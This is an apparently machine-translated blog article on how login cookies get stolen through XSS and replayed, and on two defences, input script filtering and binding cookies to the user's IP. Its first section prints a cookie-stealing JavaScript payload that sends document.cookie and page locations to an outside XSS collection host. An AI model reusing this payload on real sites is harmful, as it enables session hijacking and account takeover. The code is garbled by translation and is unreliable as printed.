Js cookie storage user information security prevention (preventing simulated login)

Generally, Cainiao only knows how to save user information to cookies. Logon only determines whether a Cookie exists and determines whether a user logs on based on the existence of the Cookie value, some even store user passwords in cookies, which is extremely dangerous. People want you to simulate your cookies every minute to log on to your users and do some dangerous things.

1. How can an attacker obtain your logon Cookie value.

Currently, I only know about the XSS attack methods and have tested the XSS attack. He published a blog on a website that embedded the XSS attack steps, the sample code is as follows:

(Function () {(new Image (). src = 'http: // xss.sssie.com/index.php? Do = api & id = RQTPpx & location = '+ escape (function (){
Try {
Return document. location. href
} Catch (e ){
Return''
}
}) () + '& Toplocation =' + escape (function (){
Try {
Return top. location. href
} Catch (e ){
Return''
}
}) () + '& Cookie =' + escape (function (){
Try {
Return document. cookie
} Catch (e ){
Return''
}
}) () + '& Opener =' + escape (function (){
Try {
Return (window. opener & window. opener. location. href )? Window. opener. location. href :''
} Catch (e ){
Return''
}
})());
})();
If (''= 1 ){
Keep = new Image ();
Keep. src = 'http: // xss.sssie.com/index.php? Do = keepsession & id = RQTPpx & url = '+ escape (document. location) +' & cookie = '+ escape (document. cookie)
}; 1

This code is implemented through a third-party XSS platform. However, there are currently many free XSS platforms that you can build on your own.

After the above steps are embedded, as long as the user logs on to his account and browses the blog published by the attacker, the attack succeeds. The XSS third-party platform sends a Cookie about my logon to the attacker, in this way, the Cookie value you log on to is immediately stolen. Is it very dangerous?

2. Attackers simulate Cookie logon.

People who have worked in background Development know how to simulate Cookie information to log on. Unless it is a Cainiao, I will not say much about it,

However, no backend developers will use some tools. For example, Fiddler can easily simulate the login of Cookie information. The implementation process will not be described here.

By simply simulating the user's Cookie, you can use your account to log on and do some dangerous operations, such as deleting your items and more dangerous operations.

Is it dangerous to come here? Next, let's talk about how to prevent this simulation.

The following describes two methods to prevent:

1. The website conducts step-by-step interception and step-by-step inspection.

For example, if rich text is used on a web site, the script is intercepted by default in rich text, but some users need to enable this reference step, perform security verification on the scripts referenced by the user input to check the risks, intercept the risky steps, and prevent the submission. In this way, the XSS attack source can be avoided at the user input layer.

2. Check the correctness of the Cookie layer.

The backend checks whether to log on to the system for strict verification. It not only checks whether the Cookie exists, but also verifies the correctness. Here I provide the following IP address verification methods to verify whether the logon is valid.

You can perform special encryption on the IP address of the user request and the unique ID of the user. In this way, the Cookie information contains the IP address of the user login, which is a safe login for many large websites, you should have seen some financial products. If you change to a network, are you prompted to log on again? This prevents attacks based on IP address verification.

The Cookie value stores the user's IP address value, so that the IP address is consistent with the IP address of the current request during each login. If the IP address is consistent, the authentication is passed. If the IP address is inconsistent, the logon is abnormal, verification fails.

Summary: Currently, the Cookie simulated login security protection is over. Thank you for your support,